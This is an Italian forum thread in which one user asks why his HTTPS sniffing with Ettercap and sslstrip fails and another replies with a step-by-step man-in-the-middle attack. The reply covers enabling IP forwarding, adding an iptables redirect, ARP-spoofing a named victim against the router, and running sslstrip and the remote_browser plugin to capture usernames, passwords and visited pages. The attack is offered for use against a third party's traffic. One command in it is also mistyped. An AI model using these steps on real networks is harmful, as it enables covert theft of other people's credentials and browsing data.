Problema con Ettercap & Sslstrip

[mapoetto]

Ciao a tutti
Ho provato un sacco di modi per sniffare le connessioni HTTPS, ma ho fallito con tutti i modi;
Ora vi dico come ho fatto:
Ho iniziato col togliere i "#" in etter.conf dove c'è ip tables e ipconfig, poi ho aperto Ettercap e ho iniziato lo sniffing con ARP Spoof, dopodichè avvio sslstrip;
Ho provato anche con la funzione dell ip_forwading, ma non cambia niente; Il problema è che sniffa i pacchetti, ma il browser rileva sempre un certificato non valido dove c'è la connessione https

[AntoM]

Ti elenco nel dettaglio i passaggi da effettuare (ovviamente prima di utilizzarli è bene sapere la loro funzione):
- Modifica il file etter.conf togliendo i # da iptables redir_command_on e redir_command_off
- Apri un terminale e digita -> echo > 1 /proc/sys/net/ipv4/ip_forward;
- Sempre nel terminale immetti -> iptables -t nat -A PREROUTING -i (nome tua interfaccia) -p tcp --dport 80 -j REDIRECT --to-port (scegli una porta, di solito il valore che si inserisce è 1000 oppure la 8080);
- Adesso -> ettercap -i (interfaccia) -TqM ARP:REMOTE /iptuorouter/ /iptargetvittima/
- Premi "h" per l'help di ettercap, con la lettera p avrai l'elenco dei plugin da utilizzare durante la sessione di MITM, scegli quello che ti interessa, è consigliabile remote_browser
- Adesso apri un'altra console per far partire l'ssl strip (senza il quale ti verrà rilevato sempre un errore nel certificato) -> sslstrip -a -l (porta scelta per il redirect del traffico)

Noterai che tutte le sessioni con connessione https si trasformeranno in http e nel terminale dove hai fatto partire il programma Ettercap visualizzerai tutti i dati di accesso come username e password, il sito internet visitato e l'indirizzo IP del sito, mentre aprendo il browser internet visualizzerai, grazie al plugin remote browser, tutte le pagine visitate dal target.

Spero di esserti stato d'aiuto